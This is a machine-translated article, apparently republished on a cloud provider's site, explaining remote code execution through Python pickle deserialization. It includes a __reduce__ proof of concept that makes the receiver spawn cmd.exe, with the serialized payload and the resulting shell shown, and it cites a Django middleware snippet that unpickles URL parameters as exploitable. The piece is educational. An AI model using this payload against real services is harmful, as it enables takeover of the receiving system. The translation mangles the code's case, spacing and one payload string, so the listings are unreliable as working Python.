Security issues caused by Python Pickle deserialization

Source: Internet
Author: User

Data serialization is a common application scenario. It is widely used in data structure network transmission, session storage, cache storage, configuration file upload, parameter receiving, and other interfaces. The main function is to allow data to be stored or transmitted to express a relatively complex data structure with only the string type, so that what you see is what you get in the application and data exchange and processing can be performed directly.
However, security problems often occur here. PHP's unserialize/_ wakeup () vulnerability, struts's ognl, xml parsing vulnerabilities, and, of course, Ruby on Rails's xml/yaml.

The problem here is that it does not occur. Once it occurs, it is usually the day of the day: remote code execution.

Why? It is related to the application scenario described in the first section. The language needs to parse its own language data structure from the string, so it must parse the string in a fixed format and then eval the parsed results internally; or, to ensure that the parsed content is in the Object state during serialization, call the function _ wakeup to save the state.

Either way, it may be used by people with interest to take over the process and let the framework execute the language into their code. In depth, this mode is one of the original sins that computers have existed since their birth:"Data and operation commands are stored together without distinction, which can be easily misunderstood."

Think about it, Buffer Overflow (other areas of the memory covered by data are executed as operation commands), SQL injection (data is executed as part of the control statement ), XSS (same as SQL injection ). Which big security issue is not caused by this original sin?
Well, if you have talked so much about the problem, let's get down to the truth.

We know that all major languages have their own data serialization methods, and Python also does. The official Library provides a library called pickle/cPickle, the functions and usage of these two libraries are the same, but one is implemented using pure py and the other is implemented using c. It is easy to use, basically the same as the serialize/unserialize method of PHP:

Import cPickle
 
Data = "test"
Packed = cPickle. dumps (data) # serialization
Data = cPickle. loads (packed) # deserialization
Www.2cto.com
>>> Packed
"S 'test' \ np1 \ n ."
Similarly, pickle can serialize any data structure of python, including a class and an object:
>>> Class A (object ):
... A = 1
... B = 2
... Def run (self ):
... Print self. a, self. B
...
>>> CPickle. dumps (())
'Ccopy _ reg \ n_reconstructor \ np1 \ n (c _ main __\ nA \ np2 \ nc _ builtin __\ nobject \ np3 \ nNtRp4 \ n .'
The code is serialized. If the run function can be automatically executed, a perfect remote execution can be formed.

How can we enable the run function to be automatically executed? Similar to php's _ wakeup magic method, python also has its own method, such as _ reduce __, which can be executed during deserialization. For details, refer to the official Python library documentation. There is more than one function.
We use _ reduce _ for a test:

>>> Class A (object ):
... A = 1
... B = 2
... Def _ reduce _ (self ):
... Return (subprocess. Popen, (('cmd.exe ',),))
...
>>> CPickle. dumps (())
"Csubprocess \ nPopen \ np1 \ n(s'0000.exe '\ np2 \ ntp3 \ ntp4 \ nRp5 \ n ."
Then open a new command line for py, simulating the receiver:
>>> CPickle. loads ("csubprocess \ nPopen \ np1 \ n(s'cmd.exe '\ np2 \ ntp3 \ ntp4 \ nRp5 \ n .")
<Subprocess. Popen object at 0x00BB8DD0>
>>> Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C: \ Documents ents and Settings \ testuser> exit
Use exit () or Ctrl-Z plus Return to exit
>>>
Bingo, a perfect shell, isn't it :)
As long as you can control the content in serialization, you can let the receiver execute the code you provide.
Is there similar code in reality? Flexible Use of google

I found a representative code here: http://djangosnippets.org/snippets/2126/.

Def unpickle_stats (stats ):
"Unpickle a pstats. Stats object """
Stats = cPickle. loads (stats) # note the following:
Stats. stream = True
Return stats
Def process_request (self, request ):
"Setup the profiler for a profiling run and clear the SQL query log.
 
If this is a resort of an existing profiling run, just return the resorted list ."""
Def unpickle (params ):
Stats = unpickle_stats (b64decode (params. get ('stats', '') # obtained from url parameters
Queries = cPickle. loads (b64decode (params. get ('queries ', '') # here too
Return stats, queries
 
If request. method! = 'Get' and \
Not (request. META. get ('HTTP _ CONTENT_TYPE ',
Request. META. get ('content _ type', '') in
['Multipart/form-data', 'application/x-www-form-urlencoded']):
Return
If (request. REQUEST. get ('profile ', False) and
(Settings. DEBUG = True or request. user. is_staff )):
Request. statsfile = tempfile. NamedTemporaryFile ()
Params = request. REQUEST
If (params. get ('show _ stats', False)
And params. get ('show _ queries ', '1') = '1 '):
# Instantly re-sort the existing stats data
Stats, queries = unpickle (params) # called here
This is the django middleware code written by a developer. It is easy to use, isn't it?
In addition, I also saw a similar tutorial on ibm using the same code, can also be exploited: http://www.ibm.com/developerworks/cn/education/grid/gr-pyth3/section4.html
Appendix 1
Exploiting misuse of Python's "pickle"
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.